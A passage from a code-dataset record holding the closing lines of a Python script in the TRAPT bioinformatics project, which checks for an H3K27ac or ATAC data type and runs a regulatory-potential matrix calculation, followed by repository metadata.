sys.argv[2]\n assert type in ['H3K27ac', 'ATAC']\n print(f'\\033[1;31m # # # CalcTRSampleRPMatrix # # #\\033[0m')\n CalcTRSampleRPMatrix(library=library, output=library, type=type).run()\n","repo_name":"LicLab-bio/TRAPT","sub_path":"src/TRAPT/CalcTRSampleRPMatrix.py","file_name":"CalcTRSampleRPMatrix.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}